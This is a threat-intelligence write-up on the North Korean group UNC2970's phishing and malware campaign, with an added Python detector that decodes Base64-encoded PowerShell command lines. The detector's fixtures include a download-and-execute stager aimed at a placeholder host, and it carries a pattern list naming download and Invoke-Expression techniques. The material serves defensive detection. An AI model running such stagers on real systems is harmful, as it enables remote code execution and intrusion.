Mar 10, 2023 marks the latest cyber attack and malware campaign launched by the North Korean espionage group UNC2970. The campaign employed previously undocumented malware families in spear-phishing operations that have targeted U.S. and European media and technology organizations since June 2022. The activity comprises two threat clusters, tracked as UNC577 (aka Temp.Hermit) and UNC4034.
The UNC4034 activity entailed the use of WhatsApp to socially engineer targets into downloading a backdoor called AIRDRY.V2 by providing them with a skills assessment test. UNC2970 used LinkedIn to make initial contact with victims and then shifted the conversation to WhatsApp, where a phishing payload was delivered under the guise of a job description.
The attack also deployed trojanized versions of TightVNC engineered to load a next-stage payload labeled LIDSHOT, which is capable of downloading and executing shellcode from a remote server. In addition, the attackers employed a C++-based backdoor known as PLANKWALK to establish a foothold within the compromised environment.
UNC2970 further abused Microsoft Intune, an endpoint management solution, to drop a bespoke PowerShell script containing a Base64-encoded payload referred to as CLOUDBURST, a C-based backdoor that communicates via HTTP. The group also used the Bring Your Own Vulnerable Driver (BYOVD) technique, deploying an in-memory-only dropper called LIGHTSHIFT to facilitate the distribution of another piece of malware codenamed LIGHTSHOW.
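A script pushed through a legitimate management channel such as Intune arrives from a trusted parent process, so a detection that keys only on "PowerShell launched from an odd place" will not fire. What remains visible is the command line itself, and a Base64-encoded payload can be decoded and inspected from process-creation telemetry before anything runs. The following is an added example written for this page, not code from the original article or from the researchers who reported the campaign; the event records, field names (`pid`, `image`, `cmdline`) and the encoded command bodies are constructed fixtures, and the suspicious-pattern list is a starting point a team would tune to its own environment. It goes beyond the specific case in the text by handling both `-EncodedCommand` (which PowerShell always interprets as UTF-16LE) and literal blobs decoded inline with `FromBase64String`.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field

# Regexes run over the DECODED command body. Each hit is a reason for review,
# not a verdict: the list is a constructed starting point, tune it locally.
SUSPICIOUS_PATTERNS = {
    "invoke-expression": re.compile(r"(?i)\b(?:invoke-expression|iex)\b"),
    "web-download": re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest"),
    "nested-base64": re.compile(r"(?i)frombase64string"),
    "reflective-load": re.compile(r"(?i)reflection\.assembly"),
}

# "-e<prefix> <blob>": PowerShell accepts any unambiguous prefix of -EncodedCommand, plus -ec.
ENCODED_FLAG_RE = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")
# A literal Base64 blob decoded inline inside a script body.
INLINE_B64_RE = re.compile(r"(?i)FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")


@dataclass
class Finding:
    pid: int
    source: str              # "encoded-command" or "inline-frombase64string"
    decoded: str
    hits: list = field(default_factory=list)


def is_encoded_command_flag(flag):
    """True for -e, -en, -enc, ... -EncodedCommand and the -ec alias; False for -ex(ecutionPolicy)."""
    flag = flag.lower()
    return flag == "ec" or "encodedcommand".startswith(flag)


def decode_blob(blob, encoding=None):
    """Base64-decode to text, or None if the blob is not valid Base64 or not text.
    -EncodedCommand is always UTF-16LE; for inline blobs the encoding is guessed from embedded NULs."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if encoding is None:
        encoding = "utf-16-le" if b"\x00" in raw else "utf-8"
    try:
        return raw.decode(encoding)
    except UnicodeDecodeError:
        return None


def score(text):
    return [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(text)]


def inspect_event(event):
    """Return a Finding for every Base64 blob found in one process-creation event."""
    findings = []
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image not in POWERSHELL_IMAGES:
        return findings
    cmdline = event["cmdline"]
    for flag, blob in ENCODED_FLAG_RE.findall(cmdline):
        if not is_encoded_command_flag(flag):
            continue
        text = decode_blob(blob, "utf-16-le")
        if text is not None:
            findings.append(Finding(event["pid"], "encoded-command", text, score(text)))
    for blob in INLINE_B64_RE.findall(cmdline):
        text = decode_blob(blob)
        if text is not None:
            findings.append(Finding(event["pid"], "inline-frombase64string", text, score(text)))
    return findings


def scan(events):
    """Only the findings whose decoded body matched at least one suspicious pattern."""
    return [f for ev in events for f in inspect_event(ev) if f.hits]


# ---- constructed fixtures (not from any real incident) ----
def _ps_b64(text):
    """Encode the way PowerShell expects for -EncodedCommand: UTF-16LE, then Base64."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def _b64(text):
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
STAGER = "$s = (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage'); Invoke-Expression $s"
BENIGN = "Get-Date -Format o"
INLINE_BODY = "Invoke-Expression (Get-Content $env:TEMP\\s.ps1 -Raw)"

SAMPLE_EVENTS = [
    {"pid": 4120, "image": PS, "cmdline": f"powershell.exe -NoProfile -WindowStyle Hidden -enc {_ps_b64(STAGER)}"},
    {"pid": 4188, "image": PS, "cmdline": f"powershell.exe -ExecutionPolicy Bypass -EncodedCommand {_ps_b64(BENIGN)}"},
    {"pid": 4201, "image": PS, "cmdline": "powershell.exe -Command \"iex ([Text.Encoding]::UTF8.GetString("
                                          "[Convert]::FromBase64String('" + _b64(INLINE_BODY) + "')))\""},
    {"pid": 4302, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": f"cmd.exe /c echo {_ps_b64(STAGER)}"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid={f.pid} via {f.source}: {f.hits}\n  {f.decoded}")
```

The benign `Get-Date` command decodes cleanly but produces no hits, which is the point of decoding rather than alerting on the mere presence of `-EncodedCommand`: encoded commands are common in legitimate management tooling, and a defender who flags every one will drown the real ones. The flag-prefix check matters in practice because PowerShell accepts `-e`, `-ec` and `-enc` as abbreviations, which a rule matching only the full `-EncodedCommand` string would miss.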
In conclusion, UNC2970 is a North Korean espionage group that has launched a malicious cyber attack and malware campaign targeting U.S. and European media and technology organizations. The attack appears to be well planned and executed, employing various malware families, obfuscation techniques, and even vulnerable drivers. It is important for organizations and individuals to remain vigilant and secure their systems to mitigate the risk of such malicious campaigns.

Key Points:
• North Korean espionage group, UNC2970, launched a malicious cyber attack and malware campaign targeting U.S. and European media and technology organizations.
• Attack employed previously undocumented malware families and various obfuscation techniques.
• Attackers used LinkedIn and WhatsApp to socially engineer victims and deliver a phishing payload.
• Attack employed trojanized versions of TightVNC, a C++-based backdoor known as PLANKWALK, and a bespoke PowerShell script containing a Base64-encoded payload referred to as CLOUDBURST.
• Attackers also employed the Bring Your Own Vulnerable Driver (BYOVD) technique with an in-memory-only dropper called LIGHTSHIFT.